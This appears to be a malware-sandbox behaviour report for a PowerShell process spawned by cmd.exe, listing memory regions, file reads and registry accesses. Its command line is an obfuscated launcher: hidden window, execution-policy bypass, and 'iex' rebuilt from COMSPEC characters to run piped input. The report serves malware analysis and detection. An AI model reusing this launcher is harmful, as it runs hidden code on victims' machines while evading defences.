Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Process #15: powershell.exe
634 182
»
Information Value
ID #15
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd &( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT )
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:44, Reason: Child Process
Unmonitor End Time: 00:02:06, Reason: Self Terminated
Monitor Duration 00:00:22
OS Process Information
»
Information Value
PID 0xb5c
Parent PID 0xb4c (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B60
0x B70
0x B74
0x B7C
0x B94
0x B98
0x 780
0x 878
0x 14C
0x 410
0x 214
0x 28C
0x 508
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00045fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00041fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory r True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File r False False False -
powershell.exe.mui 0x000e0000 0x000e2fff Memory Mapped File rw False False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory rw True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory rw True False False -
pagefile_0x0000000000110000 0x00110000 0x00110fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory r True False False -
private_0x0000000000130000 0x00130000 0x001affff Private Memory rw True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b1fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c0fff Pagefile Backed Memory rw True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory r True False False -
cversions.1.db 0x001e0000 0x001e3fff Memory Mapped File r True False False -
cversions.2.db 0x001e0000 0x001e3fff Memory Mapped File r True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f0fff Pagefile Backed Memory rw True False False -
private_0x0000000000200000 0x00200000 0x0020ffff Private Memory rw True False False -
cversions.2.db 0x00210000 0x00213fff Memory Mapped File r True False False -
private_0x0000000000220000 0x00220000 0x0022ffff Private Memory rw True False False -
private_0x0000000000230000 0x00230000 0x002affff Private Memory rw True False False -
private_0x00000000002b0000 0x002b0000 0x003affff Private Memory rw True False False -
private_0x00000000003b0000 0x003b0000 0x004affff Private Memory rw True False False -
pagefile_0x00000000004b0000 0x004b0000 0x00637fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000640000 0x00640000 0x007c0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007d0000 0x007d0000 0x01bcffff Pagefile Backed Memory r True False False -
private_0x0000000001bd0000 0x01bd0000 0x01ccffff Private Memory rw True False False -
private_0x0000000001cd0000 0x01cd0000 0x01d4ffff Private Memory rw True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db 0x01d50000 0x01d6ffff Memory Mapped File r True False False -
private_0x0000000001d70000 0x01d70000 0x01deffff Private Memory rwx True False False -
pagefile_0x0000000001df0000 0x01df0000 0x01ecefff Pagefile Backed Memory r True False False -
sortdefault.nls 0x01ed0000 0x0219efff Memory Mapped File r False False False -
pagefile_0x00000000021a0000 0x021a0000 0x02592fff Pagefile Backed Memory r True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db 0x025a0000 0x025cffff Memory Mapped File r True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x025d0000 0x02635fff Memory Mapped File r True False False -
pagefile_0x0000000002640000 0x02640000 0x02640fff Pagefile Backed Memory r True False False -
pagefile_0x0000000002650000 0x02650000 0x02652fff Pagefile Backed Memory rw True False False -
private_0x0000000002660000 0x02660000 0x026dffff Private Memory rw True False False -
pagefile_0x00000000026e0000 0x026e0000 0x026e0fff Pagefile Backed Memory rw True False False -
private_0x00000000026f0000 0x026f0000 0x026fffff Private Memory rw True False False -
private_0x0000000002700000 0x02700000 0x0271ffff Private Memory - True False False -
l_intl.nls 0x02720000 0x02722fff Memory Mapped File r False False False -
private_0x0000000002730000 0x02730000 0x027affff Private Memory rwx True False False -
private_0x00000000027b0000 0x027b0000 0x027b0fff Private Memory rw True False False -
private_0x00000000027c0000 0x027c0000 0x0283ffff Private Memory rw True False False -
private_0x0000000002840000 0x02840000 0x0293ffff Private Memory rw True False False -
kernelbase.dll.mui 0x02940000 0x029fffff Memory Mapped File rw False False False -
sorttbls.nlp 0x02a00000 0x02a04fff Memory Mapped File r False False False -
microsoft.wsman.runtime.dll 0x02a10000 0x02a17fff Memory Mapped File rwx False False False -
pagefile_0x0000000002a20000 0x02a20000 0x02a20fff Pagefile Backed Memory r True False False -
private_0x0000000002a30000 0x02a30000 0x02a3ffff Private Memory rw True False False -
private_0x0000000002a40000 0x02a40000 0x02b3ffff Private Memory rw True False False -
private_0x0000000002b40000 0x02b40000 0x02c40fff Private Memory rw True False False -
sortkey.nlp 0x02c50000 0x02c90fff Memory Mapped File r False False False -
private_0x0000000002ca0000 0x02ca0000 0x02d1ffff Private Memory rw True False False -
private_0x0000000002d20000 0x02d20000 0x1ad1ffff Private Memory rw True False False -
private_0x000000001ad20000 0x1ad20000 0x1b3effff Private Memory rw True False False -
private_0x000000001b3f0000 0x1b3f0000 0x1b46ffff Private Memory rw True False False -
system.management.automation.dll 0x1b470000 0x1b751fff Memory Mapped File rwx False False False -
pagefile_0x000000001b760000 0x1b760000 0x1b760fff Pagefile Backed Memory r True False False -
mscorrc.dll 0x1b760000 0x1b7b3fff Memory Mapped File r True False False -
system.transactions.dll 0x1e230000 0x1e278fff Memory Mapped File rwx False False False -
msvcr80.dll 0x756a0000 0x75768fff Memory Mapped File rwx False False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
psapi.dll 0x77e00000 0x77e06fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
powershell.exe 0x13fdf0000 0x13fe66fff Memory Mapped File rwx False False False -
culture.dll 0x642ff4a0000 0x642ff4a9fff Memory Mapped File rwx True False False -
system.directoryservices.ni.dll 0x7fee1030000 0x7fee11c4fff Memory Mapped File rwx True False False -
system.management.ni.dll 0x7fee11d0000 0x7fee133bfff Memory Mapped File rwx True False False -
system.xml.ni.dll 0x7fee1340000 0x7fee19e4fff Memory Mapped File rwx True False False -
microsoft.powershell.security.ni.dll 0x7fee1bf0000 0x7fee1c2dfff Memory Mapped File rwx True False False -
microsoft.powershell.commands.management.ni.dll 0x7fee1c30000 0x7fee1d47fff Memory Mapped File rwx True False False -
microsoft.powershell.commands.utility.ni.dll 0x7fee1d50000 0x7fee1f65fff Memory Mapped File rwx True False False -
system.transactions.ni.dll 0x7fee1f70000 0x7fee2054fff Memory Mapped File rwx True False False -
microsoft.wsman.management.ni.dll 0x7fee20f0000 0x7fee2199fff Memory Mapped File rwx True False False -
system.configuration.install.ni.dll 0x7fee21a0000 0x7fee21d1fff Memory Mapped File rwx True False False -
microsoft.powershell.commands.diagnostics.ni.dll 0x7fee21e0000 0x7fee2248fff Memory Mapped File rwx True False False -
system.core.ni.dll 0x7fee2250000 0x7fee257dfff Memory Mapped File rwx True False False -
system.management.automation.ni.dll 0x7fee2580000 0x7fee30dcfff Memory Mapped File rwx True False False -
microsoft.powershell.consolehost.ni.dll 0x7fee30e0000 0x7fee3191fff Memory Mapped File rwx True False False -
system.ni.dll 0x7fee31a0000 0x7fee3bc2fff Memory Mapped File rwx True False False -
mscorlib.ni.dll 0x7fee3bd0000 0x7fee4aabfff Memory Mapped File rwx True False False -
mscorwks.dll 0x7fee4ab0000 0x7fee544cfff Memory Mapped File rwx True False False -
shfolder.dll 0x7fee6a30000 0x7fee6a36fff Memory Mapped File rwx False False False -
mscoreei.dll 0x7fee9c80000 0x7fee9d18fff Memory Mapped File rwx True False False -
mscoree.dll 0x7fee9d20000 0x7fee9d8efff Memory Mapped File rwx True False False -
linkinfo.dll 0x7fef8e40000 0x7fef8e4bfff Memory Mapped File rwx False False False -
shdocvw.dll 0x7fef8e50000 0x7fef8e83fff Memory Mapped File rwx False False False -
ntshrui.dll 0x7fef9b40000 0x7fef9bbffff Memory Mapped File rwx False False False -
cscapi.dll 0x7fef9bc0000 0x7fef9bcefff Memory Mapped File rwx False False False -
apphelp.dll 0x7fefb340000 0x7fefb396fff Memory Mapped File rwx False False False -
slc.dll 0x7fefb730000 0x7fefb73afff Memory Mapped File rwx False False False -
atl.dll 0x7fefb760000 0x7fefb778fff Memory Mapped File rwx False False False -
ntmarta.dll 0x7fefbb00000 0x7fefbb2cfff Memory Mapped File rwx False False False -
uxtheme.dll 0x7fefc4b0000 0x7fefc505fff Memory Mapped File rwx False False False -
propsys.dll 0x7fefc510000 0x7fefc63bfff Memory Mapped File rwx False False False -
comctl32.dll 0x7fefc690000 0x7fefc883fff Memory Mapped File rwx False False False -
version.dll 0x7fefcd50000 0x7fefcd5bfff Memory Mapped File rwx False False False -
userenv.dll 0x7fefcf30000 0x7fefcf4dfff Memory Mapped File rwx False False False -
rsaenh.dll 0x7fefd180000 0x7fefd1c6fff Memory Mapped File rwx False False False -
cryptsp.dll 0x7fefd480000 0x7fefd496fff Memory Mapped File rwx False False False -
srvcli.dll 0x7fefd980000 0x7fefd9a2fff Memory Mapped File rwx False False False -
cryptbase.dll 0x7fefda80000 0x7fefda8efff Memory Mapped File rwx False False False -
profapi.dll 0x7fefdb90000 0x7fefdb9efff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x7fefdce0000 0x7fefdd15fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
devobj.dll 0x7fefddd0000 0x7fefdde9fff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
shell32.dll 0x7fefdfd0000 0x7fefed57fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
advapi32.dll 0x7feff0e0000 0x7feff1bafff Memory Mapped File rwx False False False -
sechost.dll 0x7feff1c0000 0x7feff1defff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
setupapi.dll 0x7feff2f0000 0x7feff4c6fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
shlwapi.dll 0x7feff640000 0x7feff6b0fff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
clbcatq.dll 0x7feff9a0000 0x7feffa38fff Memory Mapped File rwx False False False -
ole32.dll 0x7feffa40000 0x7feffc42fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7feffc50000 0x7feffd7cfff Memory Mapped File rwx False False False -
oleaut32.dll 0x7feffd80000 0x7feffe56fff Memory Mapped File rwx False False False -
wldap32.dll 0x7feffe60000 0x7feffeb1fff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
private_0x000007ff00020000 0x7ff00020000 0x7ff0002ffff Private Memory - True False False -
private_0x000007ff00030000 0x7ff00030000 0x7ff0003ffff Private Memory - True False False -
private_0x000007ff00040000 0x7ff00040000 0x7ff000dffff Private Memory - True False False -
private_0x000007ff000e0000 0x7ff000e0000 0x7ff000effff Private Memory - True False False -
private_0x000007ff000f0000 0x7ff000f0000 0x7ff0015ffff Private Memory - True False False -
private_0x000007ff00160000 0x7ff00160000 0x7ff0016ffff Private Memory - True False False -
private_0x000007ff00170000 0x7ff00170000 0x7ff0017ffff Private Memory - True False False -
private_0x000007fffff10000 0x7fffff10000 0x7fffff1ffff Private Memory rwx True False False -
private_0x000007fffff20000 0x7fffff20000 0x7fffffaffff Private Memory rwx True False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffd3000 0x7fffffd3000 0x7fffffd4fff Private Memory rw True False False -
private_0x000007fffffd5000 0x7fffffd5000 0x7fffffd6fff Private Memory rw True False False -
private_0x000007fffffd7000 0x7fffffd7000 0x7fffffd8fff Private Memory rw True False False -
private_0x000007fffffd9000 0x7fffffd9000 0x7fffffdafff Private Memory rw True False False -
private_0x000007fffffdb000 0x7fffffdb000 0x7fffffdcfff Private Memory rw True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
For performance reasons, the remaining 97 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
File (142)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 1
Fn
Get Info C:\ type = file_attributes True 4
Fn
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 3
Fn
Get Info STD_INPUT_HANDLE type = file_type True 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 4096 True 5
Fn
Data
Read - size = 4096, size_out = 2530 True 1
Fn
Data
Read - size = 542, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 21
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 2
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read STD_INPUT_HANDLE size = 1024, size_out = 79 True 1
Fn
Data
Read STD_INPUT_HANDLE size = 1024, size_out = 0 False 1
Fn
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 1459 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Registry (211)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 9
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 4
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
